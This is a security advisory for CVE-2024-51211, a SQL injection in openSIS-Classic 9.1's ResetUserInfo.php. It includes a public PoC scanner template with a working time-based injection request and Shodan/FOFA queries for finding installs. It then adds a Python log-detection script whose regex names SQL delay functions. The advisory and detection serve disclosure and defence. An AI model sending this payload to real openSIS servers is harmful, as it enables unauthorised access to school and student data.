A SQL injection vulnerability exists in OS4ED openSIS-Classic version 9.1, specifically in the resetuserinfo.php file. It is caused by improper input validation of the $username_stn_id parameter, which an attacker can manipulate to inject arbitrary SQL commands.
PoC code [public]
id: CVE-2024-51211

info:
  name: openSIS Classic v9.1 - SQL Injection
  author: Haliteroglu
  severity: critical
  description: |
    SQL injection vulnerability exists in OS4ED openSIS-Classic Version 9.1, specifically in the resetuserinfo.php file. The vulnerability is due to improper input validation of the $username_stn_id parameter, which can be manipulated by an attacker to inject arbitrary SQL commands.
  reference:
    - https://github.com/kutsa1/My-CVE/tree/main/CVE-2024-51211
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51211
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-51211
    cwe-id: CWE-89
    epss-score: 0.0657
    epss-percentile: 0.90789
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="openSIS"
    shodan-query: title:"openSIS"
  tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev

http:
  - raw:
      - |
        @timeout: 30s
        GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1&month_username_dob=x&day_username_dob=x&year_username_dob=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "contains_all(tolower(body), 'forgotpass.php', 'opensis')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100934e0bb2875d3cd3c01c08e5e1a21cd351ed0f0d091d328d36998f1e16df199c022100a6e0c9b0458f1db46b06932fae25addc23f0ee0315f30f50c004fdf8b3295314:922c64590222798bb761d5b6d8e72950
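On the defensive side, the probe above leaves a recognisable trace in web-server access logs: a request to ResetUserInfo.php whose username_stn_id parameter carries a time-delay function. The following is an added detection example, not code from the openSIS project or from the advisory; the log lines are constructed for illustration and the combined-log-format layout and the SQLI_TOKENS pattern are assumptions.

```python
# Added detection example (not part of openSIS or the original advisory): flag
# access-log entries carrying time-based SQL injection probes in the
# username_stn_id parameter of ResetUserInfo.php.
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Assumed combined log format: client ip, timestamp, "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Delay functions used by time-based probes (the public template uses BENCHMARK),
# plus the "OR <number>=" shape of the injected condition.
SQLI_TOKENS = re.compile(r'\b(benchmark|sleep|pg_sleep|waitfor)\s*\(|\bor\b\s+\d+\s*=', re.IGNORECASE)

def is_time_based_probe(target: str) -> bool:
    """True if the request targets ResetUserInfo.php with an injected username_stn_id."""
    parts = urlsplit(target)
    if parts.path.lower() != "/resetuserinfo.php":
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("username_stn_id", []):
        # parse_qs already decodes once; decode again so double-encoded payloads are seen.
        if SQLI_TOKENS.search(unquote_plus(value)):
            return True
    return False

def scan_log(lines):
    """Return (source_ip, timestamp, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_time_based_probe(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits

# Constructed sample log lines (not real traffic): a legitimate reset request,
# a probe using the payload shape from the advisory, and an unrelated page.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Nov/2024:10:01:02 +0000] "GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=1042&pass=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Nov/2024:10:01:09 +0000] "GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1 HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Nov/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 3001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, status in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} time-based SQLi probe against ResetUserInfo.php (HTTP {status})")
```

A patched deployment answers such a request quickly, so pairing this match with the response time (the template's own `duration>=7` check) separates blocked probes from ones that actually delayed the database.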